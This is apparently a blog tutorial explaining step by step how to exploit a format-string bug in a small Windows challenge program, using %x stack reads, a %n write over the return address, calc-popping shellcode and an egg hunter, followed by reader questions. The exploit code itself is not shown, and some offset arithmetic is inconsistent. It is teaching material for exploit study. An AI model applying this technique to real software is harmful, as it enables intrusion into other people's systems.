Exploiting Format Strings in Windows

I thought of making a small challenge in exploiting format strings in Windows. This is how it looks, it asks for a filename to open. At first this might be a bit confusing. There’s no vulnerable functions in reading a file. You can see that our first argument to the program is echoed back in the program.

Let’s investigate this inside a debugger. As you can see if argc == 2 the application continues the flow and argv[1] is passed into that function highlighted.

Inside that function memset is used fill the memory with zeros and strncpy is used to copy the user input inside the filled buffer space. But if you notice eax is directly called by the printf function without specifying any format string parameter. The function printf will directly call our buffer. This is quite interesting ?

Let’s try to read the stack using the %X format string which is used to display text in hex format. As you can see printf function read the stack from high memory to low memory.

I will give 80 A characters and a bunch of %x format strings and see the output.

You can see 41 which means hex A and 2558 which is %X.

We can use %n to display the number of characters written so far in a string up to the offset %n is placed. We must pass the address of the variable. Basically, this will write to a memory location. For example,

This will print the value 6.

So, let’s try placing a %n in the input and see what happens.

The program crashed while trying to write to an address. Let’s see what happened inside the debugger.
This is the place where things go messed up. The value of ECX is moved into the address pointed at EAX.

Let’s check the registers. EAX contains 78257825 which is “x%x%” and ECX contains f8.

Let’s examine the stack. If we go down the stack, we can see our injected characters on the stack. This might give you a nice idea to place the shellcode instead of the ‘A’ characters?

At the end of the function epilogue once it hits RET, EIP would point to the return address from the previous function on the stack.

If we check the call stack, we can see the first frame pointer which points to 0019f72c

The return address would be 0019f730 which points to 00401188 of the previous function. If you notice 0019f730 address got a null byte in front. But this won’t be an issue if we write this address at the end of our payload in little-endian format ?

Here’s the plan. We can control ECX and EAX in this scenario. We can write the address of shellcode inside ECX and the pointer to the return address inside the EAX register. Once the program hits “mov dword ptr [eax],ecx” the address of shellcode will be written in the return address on the stack. When the program reaches the end of the function and hits the epilogue LEAVE, RET the EIP will point to our newly written address which points to our shellcode ?
Alright, the plan sounds cool, let’s try to implement this and try out.
First, we should point EAX to our return address. My first payload was something like this. Like in the previous image the EAX contains 78257825 which is “x%x%”.

We must keep experimenting and see till EAX points to our 4 B characters. I kept increasing the “%x” characters finally got EAX pointing to “BBBB”. So, the next payload I tried was this.

Let’s try to control the ECX register by making it point to our address of shellcode. As in the previous image our shellcode is located at 0019f758. Let’s divide this number by 4.

0x0019f758/4 = 425430

Let’s give this value to the format string %x, this will change the value of ECX. At the same time, I am going to increase the %x characters from 41 to 51 to make EAX point to our Bs. This %x reads 2 characters at once. We must keep experimenting till we reach our goals ?

Now ECX points to 0019f940, but we need ECX pointed to 0019f758.

Let’s find the difference and try again.

0x0019f940 – 0x0019f758 = 488

By adding 408 to our last format string we should get somewhere close to our goal. Let’s try it out.

425430 + 488 = 425918

Now ECX points to 19fb28. Let’s again find the difference.

0x19fb28 – 0x19f758 = 976

By subtracting the difference from the last format string, we should get ECX pointing to the exact address we need.

425918 - 949 = 424942

Now ECX points to 19f758 which is the location we are going to place our shellcode.

Since we have 80 A characters I will first try to write my own shellcode to pop a calc. Because if I again increase the number of A characters it would be a pain to calculate offsets. I will use the WinExec API to call the calc. Let’s find the address of it.

This is a simple asm code that I’ve written to call the WinExec API.

This is our final exploit.

Let’s have a final look inside the debugger.

The value of ECX 0019f758 is going to be moved inside the pointer to EAX which is 0019f730, which is a stack pointer containing our return address. If we see inside the ECX register it points to our shellcode.

As soon as the function hits return EIP would point to our shellcode ?

Once we run this exploit w00t! we would get our calculator ?

How about we use an egg hunter to find our shellcode? ? One may argue we could use a long jump or we could directly place the shellcode at the beginning. But still I thought of using this for fun and curiosity.

First, I checked the bad chars and I found “\x00\x09\x20” as the bad chars in this program. Here’s the exploit with the egg hunger. Note that the offsets might change in different Windows platforms.

This method of exploitation is compiler dependent. I have experimented this on Embarcadero C++ (Borland C++) and Visual C++ 2000 compilers. In other compilers, the printf function is not the same as these. You can research more on other compilers ?

9 thoughts on “Exploiting Format Strings in Windows

  1. Hey, how did you know that the address of BBB will always be last? is printf in windows acts differently than printf in linux? i mean, usually if you use %n in printf vulnerabilities the address that you want to write should be at the begining no?

    • Actually the printf function is compiled in different ways in different compilers under Windows 🙂 I kept on adding “%X” till I reach the end of the payload. I added “BBBB” at the end since the return address has null characters.

  2. how did you use nonprintable characters as arguments when running executable in windbg for your last stage of exploit (when you were debugging the working exploit code) with 0x0019f730 (i.e. how did you input this in windbg)

Leave a Reply